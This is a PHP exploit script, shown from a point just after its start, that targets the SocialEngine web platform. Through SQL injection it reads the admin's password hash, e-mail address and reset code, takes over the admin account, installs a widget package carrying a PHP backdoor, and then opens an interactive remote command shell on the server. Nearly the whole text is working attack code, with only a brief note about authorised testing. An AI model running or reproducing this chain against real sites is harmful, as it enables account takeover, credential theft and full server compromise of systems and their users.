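\n\n");

// ---------------------------------------------------------------------------
// Exploit chain, as implemented below:
//   1. UNION-based SQL injection in activity/index/get-memberall (the
//      "text" POST parameter) is used to read the admin's password hash
//      and e-mail address from engine4_users.
//   2. A "forgot password" OTP is sent to that address and read back from
//      engine4_user_codes through the same injection.
//   3. The OTP unlocks a password-reset URL; the password is set to a
//      known value and the script logs in (solving a CAPTCHA if asked).
//   4. From the Packages Manager a widget package carrying a PHP backdoor
//      (application/widgets/rce/css.php) is uploaded and installed.
//   5. The backdoor restores the original password hash, then serves an
//      interactive command shell.
// Only run this against systems you are explicitly authorised to test.
// ---------------------------------------------------------------------------

// Temporary credentials used during the takeover; the original hash is
// written back in step 5.
const TMP_PASSWORD   = "H4ck3d???";
const TMP_PASSWORD_2 = "H4ck3d???!";
// Range of column counts probed for the UNION SELECT.
const MIN_COLUMNS = 50;
const MAX_COLUMNS = 100;

/**
 * Encode $input as a MySQL hexadecimal literal (0x...), so it can be placed
 * in the injected query without quotes.
 *
 * bin2hex() replaces the original byte loop, which accumulated into an
 * uninitialised variable ("Undefined variable $encoded" warning in PHP 8).
 * NOTE(review): an empty input yields "0x"; callers here only pass non-empty
 * values (an e-mail address, a password hash).
 */
function mysql_hex($input) {
    return "0x" . strtoupper(bin2hex((string) $input));
}

/**
 * Execute the shared cURL handle and return the response body as a string.
 *
 * A transport failure makes curl_exec() return false, which the string checks
 * in this script would read as an empty (in two places: successful) response;
 * die with the cURL error instead.
 */
function http_body($ch) {
    $body = curl_exec($ch);
    if ($body === false) die("\n[-] HTTP request failed: " . curl_error($ch) . "\n");
    return $body;
}

/**
 * Run a scalar sub-query through the UNION injection and return the value
 * that comes back in the first member's "id" field of the JSON response.
 *
 * Uses the globals $ch (shared cURL handle), $columns (column count found by
 * the probe loop below) and $url (target base URL). Dies when the response
 * is not the expected JSON list.
 */
function sql_injection($query) {
    global $ch, $columns, $url;
    // The sub-query occupies the first column; the remaining ones are padded with NULLs.
    $nulls = implode(",", array_fill(0, $columns - 1, "null"));
    $sqli = "\") AND 0 UNION SELECT ({$query}),{$nulls} #";
    curl_setopt($ch, CURLOPT_URL, "{$url}activity/index/get-memberall");
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["text" => $sqli]));
    $json_res = json_decode(http_body($ch));
    // is_array() first: count() on a non-array (e.g. a JSON object or string) throws a TypeError in PHP 8.
    if (!is_array($json_res) || !count($json_res) || !isset($json_res[0]->id)) die("[-] SQL injection failed!\n");
    return $json_res[0]->id;
}

if (!isset($argv[1])) die("[-] Usage: php {$argv[0]} <target base URL, e.g. http://target/>\n");
// Paths are appended directly to the base URL, so a trailing slash is required.
$url = rtrim($argv[1], "/") . "/";

// Temporary files written during the run. They are removed on every exit
// path (die() included), not only after a successful run: cookies.txt holds
// the admin session and p.tar is the backdoor package.
$tmp_files = ["./CAPTCHA.png", "./cookies.txt", "./p.tar"];
register_shutdown_function(function () use ($tmp_files) {
    global $ch;
    // Release the cURL handle first: libcurl flushes CURLOPT_COOKIEJAR when the
    // handle is freed, which would otherwise recreate cookies.txt after the unlink.
    $ch = null;
    foreach ($tmp_files as $f) {
        if (file_exists($f)) unlink($f);
    }
});

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate checks are disabled so that targets with self-signed TLS
// certificates can be reached; this makes the tool itself MITM-able, so do
// not copy these two options into anything that is not a throwaway exploit.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");

print "[+] Looking for correct number of columns for the SQLi\n";
$columns = false;
curl_setopt($ch, CURLOPT_URL, "{$url}activity/index/get-memberall");
for ($i = MIN_COLUMNS; $i <= MAX_COLUMNS; $i++) {
    print "\r[+] Trying with number: {$i}";
    $nulls = implode(",", array_fill(0, $i, "null"));
    $sqli = "\") AND 0 UNION SELECT {$nulls}#";
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["text" => $sqli]));
    $json_res = json_decode(http_body($ch));
    // A non-empty JSON list means the UNION matched the column count.
    if (is_array($json_res) && count($json_res) > 0) {
        $columns = $i;
        break;
    }
}
if (!$columns) die("\n[-] Attack failed, number of columns not found!\n");
print "\n[*] Number of columns for the SQLi: {$columns}\n";

print "[+] Fetching admin password hash\n";
$admin_pwd = sql_injection("SELECT password FROM engine4_users WHERE user_id = 1");
print "[*] Admin password hash: {$admin_pwd}\n";
print "[+] Fetching admin email address\n";
$admin_email = sql_injection("SELECT email FROM engine4_users WHERE user_id = 1");
print "[*] Admin email address: {$admin_email}\n";

print "[+] Sending OTP to this email address\n";
curl_setopt($ch, CURLOPT_URL, "{$url}core/otp/sendotp?email=" . urlencode($admin_email) . "&type=forgot");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match("/code sent successfully/i", http_body($ch))) die("[-] OTP not sent!\n");

print "[+] Fetching OTP\n";
// NOTE(review): if engine4_user_codes holds several rows for this address the
// scalar sub-query fails and this dies; the schema is not visible here to pick the newest one.
$otp = sql_injection("SELECT code FROM engine4_user_codes WHERE email = " . mysql_hex($admin_email));
print "[*] OTP: {$otp}\n";

print "[+] Validating OTP\n";
if (file_exists("./cookies.txt")) unlink("./cookies.txt"); // start from a fresh session
curl_setopt($ch, CURLOPT_URL, "{$url}core/otp/validateotp?email=" . urlencode($admin_email) . "&code=" . urlencode((string) $otp) . "&type=forgot");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match("/code you entered is valid/i", http_body($ch))) die("[-] OTP validation failed!\n");

print "[+] Retrieving password reset URL\n";
curl_setopt($ch, CURLOPT_URL, "{$url}user/auth/forgot");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["email" => $admin_email]));
if (!preg_match("/user\/auth\/reset\/code\/[^']+/", http_body($ch), $m)) die("[-] Password reset URL not found!\n");
$reset_path = $m[0];
print "[+] Resetting password through the following URL: {$url}{$reset_path}\n";
curl_setopt($ch, CURLOPT_URL, "{$url}{$reset_path}");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["password" => TMP_PASSWORD, "passconf" => TMP_PASSWORD]));
if (!preg_match("/password has been reset/i", http_body($ch))) die("[-] Password reset failed!\n");

print "[+] Performing login as admin user\n";
curl_setopt($ch, CURLOPT_URL, "{$url}login");
curl_setopt($ch, CURLOPT_POST, false);
$res = http_body($ch);
$login_fields = ["email" => $admin_email, "password" => TMP_PASSWORD];
// The CAPTCHA fields are only sent when the login form asks for them; the
// original sent them unconditionally and relied on http_build_query() dropping nulls.
if (preg_match('/"captcha\[id\]" value="([^"]+)/i', $res, $m)) {
    print "[+] CAPTCHA required! Downloading it\n";
    if (!preg_match('/src="\/(public\/[^"]+)/i', $res, $img)) die("[-] CAPTCHA URL not found!\n");
    // Same relaxed TLS policy as the cURL handle, otherwise an https target with a
    // self-signed certificate would fail here after every earlier step succeeded.
    $tls_ctx = stream_context_create(["ssl" => ["verify_peer" => false, "verify_peer_name" => false]]);
    $png = file_get_contents($url . $img[1], false, $tls_ctx);
    if ($png === false) die("[-] CAPTCHA download failed!\n");
    file_put_contents("CAPTCHA.png", $png);
    print "[+] Open CAPTCHA.png and insert the text: ";
    $login_fields["captcha[id]"] = $m[1];
    $login_fields["captcha[input]"] = trim((string) fgets(STDIN));
}
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
if (!preg_match('/"status":true/i', http_body($ch))) die("[-] Login failed!\n");

print "[+] Changing admin password once again\n";
// NOTE(review): the second change is kept from the original; presumably the
// password set through the reset flow is not accepted by install/login — not confirmed here.
curl_setopt($ch, CURLOPT_URL, "{$url}members/settings/password");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["oldPassword" => TMP_PASSWORD, "password" => TMP_PASSWORD_2, "passwordConfirm" => TMP_PASSWORD_2]));
if (!preg_match('/"status":true/i', http_body($ch))) die("[-] Password change failed!\n");

print "[+] Performing login into Packages Manager\n";
curl_setopt($ch, CURLOPT_URL, "{$url}install/login");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["email" => $admin_email, "password" => TMP_PASSWORD_2]));
// An empty body is the success case here; an error page comes back with content.
if (strlen(http_body($ch)) > 0) die("[-] Login failed!\n");

print "[+] Uploading RCE widget\n";
// Inline widget package (gzip + base64). From its later use it is expected to
// install as "widget-rce-7.8.0" and to ship application/widgets/rce/css.php.
$tar = gzdecode(base64_decode("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"));
if ($tar === false) die("[-] Embedded package could not be decoded!\n");
file_put_contents("p.tar", $tar);
curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/upload");
curl_setopt($ch, CURLOPT_POSTFIELDS, ["Filedata" => new CURLFile("p.tar"), "format" => "json"]);
if (!preg_match('/"status":1/i', http_body($ch))) die("[-] Upload failed!\n");

print "[+] Installing RCE widget\n";
// Walk the Packages Manager wizard; each step's success is recognised by a
// fragment of its response page.
curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/extract?package=p.tar&format=json");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/"status":1/i', http_body($ch))) die("[-] Extract failed!\n");
curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/prepare");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["packages[]" => "widget-rce-7.8.0"]));
if (!preg_match('/continue/i', http_body($ch))) die("[-] Prepare failed!\n");
curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/prepare?skip=0");
curl_setopt($ch, CURLOPT_POST, false);
if (strlen(http_body($ch)) > 0) die("[-] Prepare failed!\n");
curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/vfs");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["config[path]" => 1, "config[search]" => 1, "adapter" => "system", "step" => "adapter", "previousAdapter" => "system", "execute" => 1]));
if (strlen(http_body($ch)) > 0) die("[-] VFS request failed!\n");
// Remaining wizard pages are plain GETs: [path suffix, success pattern, label for the error message].
$wizard_steps = [
    ["perms",    '/continue with the installation/i',               "Perms"],
    ["place",    '/continue with the installation/i',               "Place"],
    ["query",    '/can now finalize the installation/i',            "Query"],
    ["complete", '/installation has been completed successfully/i', "Complete"],
];
curl_setopt($ch, CURLOPT_POST, false);
foreach ($wizard_steps as [$step, $pattern, $label]) {
    curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/{$step}");
    if (!preg_match($pattern, http_body($ch))) die("[-] {$label} request failed!\n");
}

print "[+] Restoring original admin password\n";
// PHP run by the backdoor: it loads the application's own DB settings
// (relative to application/widgets/rce/) and writes the saved hash back.
$phpcode = 'define("_ENGINE", 1); $settings = include "../../settings/database.php"; $params = $settings["params"]; $link = mysqli_connect($params["host"], $params["username"], $params["password"], $params["dbname"]); if (mysqli_query($link, "UPDATE engine4_users SET password = ' . mysql_hex($admin_pwd) . ' WHERE user_id = 1")) print "DONE"; mysqli_close($link);';
curl_setopt($ch, CURLOPT_URL, "{$url}application/widgets/rce/css.php");
// The backdoor takes its payload base64-encoded in a custom "C" request header
// (inferred from this usage; the package contents are not visible here).
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode($phpcode)]);
if (!preg_match('/DONE/', http_body($ch))) die("[-] Exploit failed!\n");

print "[+] Launching shell\n";
// Commands run from three levels up (the web root); "____" brackets the output so it can be cut out.
$phpcode = "chdir('../../..'); print '____'; passthru(base64_decode('%s')); print '____';";
while (true) {
    print "\nsocialengine-shell# ";
    $line = fgets(STDIN);
    if ($line === false) break;        // EOF on stdin: the original looped forever sending empty commands
    $cmd = trim($line);
    if ($cmd === "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
    if (!preg_match('/____(.*)____/s', http_body($ch), $m)) die("\n[-] Exploit failed!\n\n");
    print $m[1];
}
// Temporary files are removed by the shutdown handler registered above.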